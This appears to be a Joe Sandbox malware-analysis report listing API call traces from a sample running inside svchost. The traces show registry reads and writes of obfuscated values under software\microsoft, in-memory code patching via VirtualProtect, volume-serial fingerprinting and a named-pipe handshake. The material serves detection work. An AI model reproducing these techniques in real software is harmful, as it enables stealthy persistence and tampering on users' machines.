                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 278890334-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC478A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC47C0
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02BC47E7
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02BC480A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02BC487D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4884
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4894
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02BC48C2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 1484339481-3673152959
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02BB3969
                                                                                                                                                                                                                • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02BB397C
                                                                                                                                                                                                                • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02BB3993
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB39BD
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB39E1
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                                • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                                • API String ID: 844136142-2194319270
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCA068
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BCA227), ref: 02BCA09F
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(02BCA227,9e938cfca,00000000,?,00000000,?), ref: 02BCA0BC
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02BCA227), ref: 02BCA0C6
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BCA0F9
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9e938cfca,00000000,?,00000000,?), ref: 02BCA116
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BCA120
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9e938cfca$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-3363573929
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC36B8
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02BC36EF
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,9E938CB4a,00000000,?,00000000,?), ref: 02BC370C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BC3716
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BC3749
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9E938CB4a,00000000,?,00000000,?), ref: 02BC3766
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BC3770
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9E938CB4a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-1957466653
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB3428
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BC5B76), ref: 02BB345F
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(02BC5B76,9e938d6ea,00000000,?,00000000,?), ref: 02BB347C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02BC5B76), ref: 02BB3486
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BB34B9
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9e938d6ea,00000000,?,00000000,?), ref: 02BB34D6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BB34E0
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9e938d6ea$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-725738567
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: /$UT
                                                                                                                                                                                                                • API String ID: 0-1626504983
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00004070,75570F00,00000000,75572F00,?,02BC3CE8,?), ref: 02BD9793
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,02BC3CE8,?), ref: 02BD9796
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD97AB
                                                                                                                                                                                                                • CreateFileA.KERNEL32(02BC3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02BC3CE8,?), ref: 02BD9802
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9825
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9828
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9834
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9837
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010,?,02BC3CE8,?), ref: 02BD984A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD984D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocAllocateCreateFileFreeValidatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 529598968-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4664
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02BC4687
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 02BC46AA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 02BC471D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BC4724
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4734
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02BC4762
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 4043890984-3673152959
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02BCA7CB
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02BCA818
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02BCA847
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000), ref: 02BCA84E
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02BCA862
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 02BCA879
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCA881
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 842647815-465009422
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCA147
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BCA159
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,02BCA33F,?,02BCA33F), ref: 02BCA173
                                                                                                                                                                                                                • RegSetValueExA.KERNEL32(02BCA33F,9e938cfca,00000000,00000004,00000004,00000004,02BCA33F), ref: 02BCA190
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BCA19A
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BCA1A4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                • String ID: 9e938cfca$software\microsoft
                                                                                                                                                                                                                • API String ID: 287100044-3363573929
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD5B86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                                • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$617D73CA$9E938C60a
                                                                                                                                                                                                                • API String ID: 2823094833-2422844119
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC5B18
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(02BC6C37,9e938b89a,00000000,?,00000000,?), ref: 02BC5B5A
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02BC6C37), ref: 02BC5B64
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(-80000001), ref: 02BC5B2A
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: IsUserAnAdmin.SHELL32 ref: 02BB3428
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BC5B76), ref: 02BB345F
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegQueryValueExA.ADVAPI32(02BC5B76,9e938d6ea,00000000,?,00000000,?), ref: 02BB347C
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(02BC5B76), ref: 02BB3486
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BB34B9
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegQueryValueExA.KERNEL32(?,9e938d6ea,00000000,?,00000000,?), ref: 02BB34D6
                                                                                                                                                                                                                  • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(?), ref: 02BB34E0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9E938430a$9e938b89a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-3787693855
                                                                                                                                                                                                                • Opcode ID: fd8f9bbf0617196c5251f5a3f23260377783634c189c869dffc6e3627c999fc0
                                                                                                                                                                                                                • Instruction ID: a62715dba59afcd3f8e8fea421f693567b980b65ed039a08091328cd8cbc8039
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd8f9bbf0617196c5251f5a3f23260377783634c189c869dffc6e3627c999fc0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F0112B5E90209ABDB20DFF4CC45BEEBBB8EB04744F504698F615E7280E774A5148B94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA5A0
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA67A
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA686
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02BCA693,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6BC
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6C6
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6CD
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: memset.MSVCRT ref: 02BCA6DE
                                                                                                                                                                                                                  • Part of subcall function 02BCA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA72A
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,7556F550,00000000,76C0BD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA697
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA69E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2609073853-0
                                                                                                                                                                                                                • Opcode ID: 40c1a7ad85cfff5a5c9cf9136929f45ba2685fa0c6c19c23c8a9f65b88603b42
                                                                                                                                                                                                                • Instruction ID: 1d9525954b464bd3715ad2aa41e407b1b0aa722e1044ac8a64d1080cfb320eb2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c1a7ad85cfff5a5c9cf9136929f45ba2685fa0c6c19c23c8a9f65b88603b42
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29412C72A0061AABCB10AE788CC4FBE7B6AEF80354F54467CE65597385DB35E901C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02BD94A4,00000000,00140B17), ref: 02BD9005
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,02BD94A4,00000000,00140B17), ref: 02BD900C
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD901F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,02BD94A0,?,02BD94A4,00000000,00140B17), ref: 02BD90CE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BD94A4,00000000,00140B17), ref: 02BD90D1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BD94A4,00000000,00140B17), ref: 02BD90DD
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,02BD94A4,00000000,00140B17), ref: 02BD90E0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocateFreeValidatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 219023833-0
                                                                                                                                                                                                                • Opcode ID: 3f4a04a757d2eee8b3826eafebb9a8c9439b8630387e2557e421b6470a2f9e25
                                                                                                                                                                                                                • Instruction ID: a770b4934166d9393e8e14f96e64c1db0b9c2d20240669e9d8d3d11c7de23ac7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f4a04a757d2eee8b3826eafebb9a8c9439b8630387e2557e421b6470a2f9e25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56219FB1A017009FC721AF75D884ADBBFE9EF49754B40885DE69E8B200D774A405CFA2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                • API String ID: 3225117150-898603304
                                                                                                                                                                                                                • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,7556F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75572F00,02BC3D3F), ref: 02BB791C
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02BB7923
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7933
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75572F00,02BC3D3F), ref: 02BB7955
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB7958
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7965
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB7968
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$AllocateValidatememset$CreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3862602232-0
                                                                                                                                                                                                                • Opcode ID: 34cebae6a0784b7cce7d98b9ae920b151e40b831387aca7467231857b9572b89
                                                                                                                                                                                                                • Instruction ID: 023e1a8f1ddeec67437704c4c3ab3070623ee9a422b2ba651f2a4461b04d62a4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34cebae6a0784b7cce7d98b9ae920b151e40b831387aca7467231857b9572b89
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F411A372A01214BBD731AAA59C44FABB66CEFC8B55F510154BA44E7280DFB0D90087E0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02BB3B25,?), ref: 02BB38C0
                                                                                                                                                                                                                • RegSetValueExA.KERNEL32(00000000,9e938dd0a,00000000,00000004,?,00000004,?,?,02BB3B25,?), ref: 02BB38DC
